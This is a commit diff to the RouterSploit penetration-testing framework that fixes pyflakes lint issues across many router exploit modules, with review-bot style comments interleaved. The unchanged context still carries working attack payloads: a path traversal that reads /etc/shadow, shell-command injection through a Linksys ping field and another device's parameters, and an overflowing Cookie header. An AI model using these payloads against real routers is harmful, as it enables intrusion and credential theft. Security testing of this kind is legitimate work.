Commit 73e8b5cd by fwkz

Fixing pyflakes violations

parent fc4f3d53
......@@ -4,7 +4,6 @@ from routersploit import (
exploits,
print_status,
print_error,
print_info,
print_success,
print_table,
http_request,
......@@ -20,7 +19,8 @@ class Exploit(exploits.Exploit):
"""
__info__ = {
'name': '3Com AP8760 Password Disclosure',
'description': 'Exploits 3Com AP8760 password disclosure vulnerability. If the target is vulnerable it is possible to fetch credentials for administration user.',
'description': 'Exploits 3Com AP8760 password disclosure vulnerability.'
'If the target is vulnerable it is possible to fetch credentials for administration user.',
'authors': [
'Richard Brain', # vulnerability discovery
'Marcin Bury <marcin.bury[at]reverse-shell.com>', # routersploit module
......
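Review bot: The wrapped `'description'` value loses the space between its two sentences, because adjacent string literals are joined exactly as written and the first fragment ends in `vulnerability.` with no trailing space, so the text reads `vulnerability.If the target`. End the first fragment with a space: `'Exploits 3Com AP8760 password disclosure vulnerability. '`. The same join appears in the wrapped descriptions of the Cisco Unified (`devices.` + `If the target`), Huawei E5331 (`Hotspot` + `devices.`), Huawei HG530/HG520b, Huawei HG866 and Linksys E1500/E2500 sections. The `__info__` dict continues outside the hunk.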
......@@ -5,7 +5,6 @@ from routersploit import (
print_error,
print_info,
http_request,
random_text,
mute,
validators,
)
......@@ -22,7 +21,8 @@ class Exploit(exploits.Exploit):
'Andrea Fabizi', # vulnerability discovery
'Marcin Bury <marcin.bury[at]reverse-shell.com>', # routersploit module
],
'description': 'Module exploits 3Com OfficeConnect remote command execution vulnerability which allows executing command on operating system level.',
'description': 'Module exploits 3Com OfficeConnect remote command execution '
'vulnerability which allows executing command on operating system level.',
'references': [
'https://www.exploit-db.com/exploits/9862/',
],
......
......@@ -4,7 +4,6 @@ from routersploit import (
print_status,
print_error,
http_request,
random_text,
mute,
validators,
)
......
from routersploit import (
exploits,
print_success,
print_status,
print_error,
print_info,
http_request,
......@@ -17,7 +16,8 @@ class Exploit(exploits.Exploit):
"""
__info__ = {
'name': 'Cisco DPC2420 Info Disclosure',
'description': 'Module exploits Cisco DPC2420 information disclosure vulnerability which allows reading sensitive information from the configuration file.',
'description': 'Module exploits Cisco DPC2420 information disclosure vulnerability '
'which allows reading sensitive information from the configuration file.',
'authors': [
'Facundo M. de la Cruz (tty0) <fmdlc[at]code4life.com.ar>', # vulnerability discovery
'Marcin Bury <marcin.bury[at]reverse-shell.com>', # routersploit module
......
from routersploit import (
exploits,
print_success,
print_status,
print_error,
print_info,
http_request,
......@@ -12,12 +11,14 @@ from routersploit import (
class Exploit(exploits.Exploit):
"""
Exploit implementation for Path Traversal vulnerability in Cisco Unified Communications Manager, Cisco Unified Contact Center Express and Cisco Unified IP Interactive Voice Response devices.
Exploit implementation for Path Traversal vulnerability in Cisco Unified Communications Manager,
Cisco Unified Contact Center Express and Cisco Unified IP Interactive Voice Response devices.
If the target is vulnerable it allows to read files from the filesystem.
"""
__info__ = {
'name': 'Cisco Unified Multi Path Traversal',
'description': 'Module exploits path traversal vulnerability in Cisco Unified Communications Manager, Cisco Unified Contact Center Express and Cisco Unified IP Interactive Voice Response devices.'
'description': 'Module exploits path traversal vulnerability in Cisco Unified Communications Manager, '
'Cisco Unified Contact Center Express and Cisco Unified IP Interactive Voice Response devices.'
'If the target is vulnerable it allows to read files from the filesystem.',
'authors': [
'Facundo M. de la Cruz (tty0) <fmdlc[at]code4life.com.ar>', # vulnerability discovery
......
......@@ -2,7 +2,6 @@ from routersploit import (
exploits,
print_error,
print_status,
print_info,
print_success,
http_request,
mute,
......
......@@ -2,7 +2,6 @@ from routersploit import (
exploits,
print_error,
print_status,
print_info,
print_success,
http_request,
mute,
......
......@@ -2,7 +2,6 @@ from routersploit import (
exploits,
print_error,
print_status,
print_info,
print_success,
http_request,
mute,
......
......@@ -30,14 +30,25 @@ class Exploit(exploits.Exploit):
]
}
target = exploits.Option('', 'Target address e.g. http://192.168.1.1') # target address
target = exploits.Option('', 'Target address e.g. http://192.168.1.1', validators=validators.address) # target address
port = exploits.Option(8080, 'Target port') # default port
filename = exploits.Option('/etc/shadow', 'File to read') # file to read
def run(self):
# address and parameters
url = "{}:{}/cgi-bin/webproc".format(self.target, self.port)
data = {"getpage": "html/index.html","*errorpage*": "../../../../../../../../../../..{}".format(self.filename), "var%3Amenu": "setup", "var%3Apage": "connected", "var%": "", "objaction": "auth", "%3Ausername": "blah", "%3Apassword": "blah","%3Aaction": "login","%3Asessionid": "abcdefgh"}
data = {
"getpage": "html/index.html",
"*errorpage*": "../../../../../../../../../../..{}".format(self.filename),
"var%3Amenu": "setup",
"var%3Apage": "connected",
"var%": "",
"objaction": "auth",
"%3Ausername": "blah",
"%3Apassword": "blah",
"%3Aaction": "login",
"%3Asessionid": "abcdefgh"
}
# connection
response = http_request(method="POST", url=url, data=data)
......
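Review bot: Adding `validators=validators.address` to `target` changes how the option value is processed, which goes beyond a pyflakes cleanup, and the help text on the same line still gives `http://192.168.1.1` as its example. The validator's behaviour is not visible on this page, so confirm that it accepts and preserves the form the help text advertises, or change the example to match what it returns. This file's import block is outside the hunk, so also confirm that `validators` is actually imported here. The same argument is added to `target` in two later sections (the one defining `private_keys` and the one defining `oids`).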
from routersploit import (
exploits,
print_success,
print_status,
print_error,
http_request,
......
......@@ -2,8 +2,6 @@ import re
from routersploit import (
exploits,
print_status,
print_error,
print_success,
print_table,
http_request,
......@@ -19,7 +17,8 @@ class Exploit(exploits.Exploit):
"""
__info__ = {
'name': 'Huawei E5331 Info Disclosure',
'description': 'Module exploits information disclosure vulnerability in Huawei E5331 MiFi Mobile Hotspot devices. If the target is vulnerable it allows to read sensitive information.',
'description': 'Module exploits information disclosure vulnerability in Huawei E5331 MiFi Mobile Hotspot'
'devices. If the target is vulnerable it allows to read sensitive information.',
'authors': [
'J. Greil https://www.sec-consult.com', # vulnerability discovery
'Marcin Bury <marcin.bury[at]reverse-shell.com>', # routersploit module
......
......@@ -2,7 +2,6 @@ import re
from routersploit import (
exploits,
print_status,
print_error,
print_success,
print_info,
......@@ -19,7 +18,8 @@ class Exploit(exploits.Exploit):
"""
__info__ = {
'name': 'Huawei HG530 & HG520b Password Disclosure',
'description': 'Module exploits password disclosure vulnerability in Huawei HG530 and HG520b devices. If the target is vulnerable it allows to read credentials.',
'description': 'Module exploits password disclosure vulnerability in Huawei HG530 and HG520b devices.'
'If the target is vulnerable it allows to read credentials.',
'authors': [
'Fady Mohamed Osman (@fady_osman)', # vulnerability discovery
'Marcin Bury <marcin.bury[at]reverse-shell.com>', # routersploit module
......
import re
from routersploit import (
exploits,
print_status,
......@@ -18,7 +16,8 @@ class Exploit(exploits.Exploit):
"""
__info__ = {
'name': 'Huawei HG866 Password Cahnge',
'description': 'Module exploits password change vulnerability in Huawei HG866 devices. If the target is vulnerable it allows to change administration password.',
'description': 'Module exploits password change vulnerability in Huawei HG866 devices.'
'If the target is vulnerable it allows to change administration password.',
'authors': [
'hkm', # vulnerability discovery
'Marcin Bury <marcin.bury[at]reverse-shell.com>', # routersploit module
......
import re
from routersploit import (
exploits,
print_success,
......@@ -19,7 +17,9 @@ class Exploit(exploits.Exploit):
"""
__info__ = {
'name': 'Linksys E1500/E2500',
'description': 'Module exploits remote command execution in Linksys E1500/E2500 devices. Diagnostics interface allows executing root privileged shell commands is available on dedicated web pages on the device.',
'description': 'Module exploits remote command execution in Linksys E1500/E2500 devices.'
'Diagnostics interface allows executing root privileged shell commands is '
'available on dedicated web pages on the device.',
'authors': [
'Michael Messner', # vulnerability discovery
'Esteban Rodriguez (n00py)', # routersploit module
......@@ -57,9 +57,19 @@ class Exploit(exploits.Exploit):
def execute(self, cmd):
url = "{}:{}/apply.cgi".format(self.target, self.port)
data = {"submit_button": "Diagnostics", "change_action":"gozila_cgi", "submit_type":"start_ping","action":"","commit":"0","ping_ip":"127.0.0.1","ping_size": "&" + cmd,"ping_times":"5","traceroute_ip":"127.0.0.1"}
data = {
"submit_button": "Diagnostics",
"change_action": "gozila_cgi",
"submit_type": "start_ping",
"action": "",
"commit": "0",
"ping_ip": "127.0.0.1",
"ping_size": "&" + cmd,
"ping_times": "5",
"traceroute_ip": "127.0.0.1"
}
response = http_request(method="POST", url=url, data=data, auth=(self.username, self.password))
http_request(method="POST", url=url, data=data, auth=(self.username, self.password))
return ""
@mute
......@@ -67,7 +77,18 @@ class Exploit(exploits.Exploit):
mark = random_text(32)
cmd = "echo {}".format(mark)
url = "{}:{}/apply.cgi".format(self.target, self.port)
data = {"submit_button": "Diagnostics", "change_action":"gozila_cgi", "submit_type":"start_ping","action":"","commit":"0","ping_ip":"127.0.0.1","ping_size": "&" + cmd,"ping_times":"5","traceroute_ip":"127.0.0.1" }
data = {
"submit_button":
"Diagnostics",
"change_action": "gozila_cgi",
"submit_type": "start_ping",
"action": "",
"commit": "0",
"ping_ip": "127.0.0.1",
"ping_size": "&" + cmd,
"ping_times": "5",
"traceroute_ip": "127.0.0.1"
}
response = http_request(method="POST", url=url, data=data, auth=(self.username, self.password))
if response is None:
......
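Review bot: In the second reflowed `data` literal the first entry is split over two lines (`"submit_button":` then `"Diagnostics",`), unlike the otherwise identical literal in `execute()` in the previous hunk. Write it as `"submit_button": "Diagnostics",` so both read the same. Both dicts carry the same nine keys and differ only in `cmd`, so building the form in one private helper would stop the two copies drifting apart. The method containing the second literal starts above its hunk and continues below it.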
import re
import socket
import struct
import time
......@@ -9,7 +8,6 @@ from routersploit import (
print_status,
print_error,
print_success,
print_info,
mute,
)
......
......@@ -6,7 +6,6 @@ from routersploit import (
print_error,
http_request,
mute,
validators,
)
......@@ -144,12 +143,16 @@ class Exploit(exploits.Exploit):
'Connection': 'keep-alive',
'Accept-Encoding': 'gzip, deflate',
'Cache-Control': 'no-cache',
'Cookie' : 'C' + str(number) + '=' + 'B' * offset + '\x00'}
'Cookie': 'C' + str(number) + '=' + 'B' * offset + '\x00'}
response = http_request(method="GET", url=url, headers=headers)
if response is not None and response.status_code <= 302:
print_success("Seems good but check " + "{}:{}".format(self.target, self.port) + " using your browser to verify if authentication is disabled or not.")
print_success(
"Seems good but check "
+ "{}:{}".format(self.target, self.port)
+ " using your browser to verify if authentication is disabled or not."
)
return True
else:
print_error("Failed.")
......
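Review bot: The reflowed `print_success(...)` call still assembles one sentence from three pieces joined with `+` around a `.format()` call, which is harder to read than a single template. Two adjacent literals with one format call say the same thing: `"Seems good but check {}:{} using your browser to verify "` followed by `"if authentication is disabled or not.".format(self.target, self.port)`. The enclosing method starts and ends outside the hunk.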
......@@ -24,7 +24,7 @@ class Exploit(exploits.Exploit):
'Cristiano Maruti (@cmaruti)', # Baracuda Load Balancer vulnerabiltiy discovery
'Jasper Greve', # Ceragon FibeAir IP-10 vulnerability doscovery
'HD Moore', # Ceragon FibeAir IP-10 vulnerability discovery
'Matta Consulting' , # F5 BigIP
'Matta Consulting', # F5 BigIP
'Marcin Bury <marcin.bury[at]reverse-shell.com>', # routersploit module
],
'references': [
......@@ -52,7 +52,7 @@ class Exploit(exploits.Exploit):
],
}
target = exploits.Option('', 'Target IP address e.g. 192.168.1.1') # target address
target = exploits.Option('', 'Target IP address e.g. 192.168.1.1', validators=validators.address) # target address
private_keys = [
{ # quantum dxi v1000
......
......@@ -4,10 +4,8 @@ import re
from routersploit import (
exploits,
print_status,
print_error,
print_success,
print_info,
print_table,
random_text,
mute,
......@@ -69,14 +67,14 @@ class Exploit(exploits.Exploit):
conf = self.execute(s, 1)
lines = re.split("\x00|\x01", conf)
pattern = re.compile('user(name)?|password|login');
pattern = re.compile('user(name)?|password|login')
credentials = []
for line in lines:
try:
(var, value) = line.split("=")
if len(value)>0 and pattern.search(var):
if len(value) > 0 and pattern.search(var):
credentials.append((var, value))
except ValueError:
pass
......@@ -86,10 +84,9 @@ class Exploit(exploits.Exploit):
else:
print_error("Target is not vulnerable")
def execute(self, s, message, payload=""):
header = struct.pack(self.endianness + 'III', 0x53634D4D, message, len(payload)+1)
s.send(header + payload +"\x00")
s.send(header + payload + "\x00")
r = s.recv(0xC)
while len(r) < 0xC:
......
......@@ -6,7 +6,6 @@ from routersploit import (
print_status,
print_error,
print_success,
print_info,
random_text,
mute,
)
......@@ -65,7 +64,6 @@ class Exploit(exploits.Exploit):
else:
print_error("Target is not vulnerable")
def command_loop(self):
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.settimeout(30)
......@@ -82,7 +80,7 @@ class Exploit(exploits.Exploit):
def execute(self, s, message, payload=""):
header = struct.pack(self.endianness + 'III', 0x53634D4D, message, len(payload)+1)
s.send(header + payload +"\x00")
s.send(header + payload + "\x00")
r = s.recv(0xC)
while len(r) < 0xC:
......
......@@ -74,7 +74,7 @@ class Exploit(exploits.Exploit):
"001122334455 -c 0 ;{}; echo #".format(self.target, self.port, self.valid_resource, cmd))
# blind command injection
response = http_request(method="GET", url=url)
http_request(method="GET", url=url)
return ""
@mute
......
......@@ -2,7 +2,6 @@ from routersploit import (
exploits,
print_error,
print_status,
print_info,
print_success,
http_request,
mute,
......
......@@ -3,10 +3,8 @@ from routersploit import (
exploits,
print_success,
print_error,
print_info,
print_status,
print_table,
http_request,
mute,
validators,
)
......@@ -32,7 +30,7 @@ class Exploit(exploits.Exploit):
]
}
target = exploits.Option('', 'Target IP address e.g. 192.168.1.1')
target = exploits.Option('', 'Target IP address e.g. 192.168.1.1', validators=validators.address)
oids = { # make, model, software version
"model": "1.3.6.1.2.1.1.1.0",
......
......@@ -6,7 +6,6 @@ from routersploit import (
exploits,
print_success,
print_error,
print_info,
print_status,
http_request,
mute,
......
import re
import string
from routersploit import (
exploits,
......@@ -55,7 +54,6 @@ class Exploit(exploits.Exploit):
print_info(self.execute(cmd))
def execute(self, cmd):
url = "{}:{}/web_shell_cmd.gch".format(self.target, self.port)
headers = {u'Content-Type': u'multipart/form-data'}
......
......@@ -36,9 +36,9 @@ class Exploit(exploits.Exploit):
path = 'exploits'
modules = []
for device in listdir(rootpath+path): # TODO refactor this, using load_modules() from core
for device in listdir(rootpath + path): # TODO refactor this, using load_modules() from core
if not device.endswith(".py") and not device.endswith(".pyc"):
for f in listdir(rootpath+path + "/" + device):
for f in listdir(rootpath + path + "/" + device):
if f.endswith(".py") and f != "__init__.py":
modules.append(device + "/" + f[:-3])
......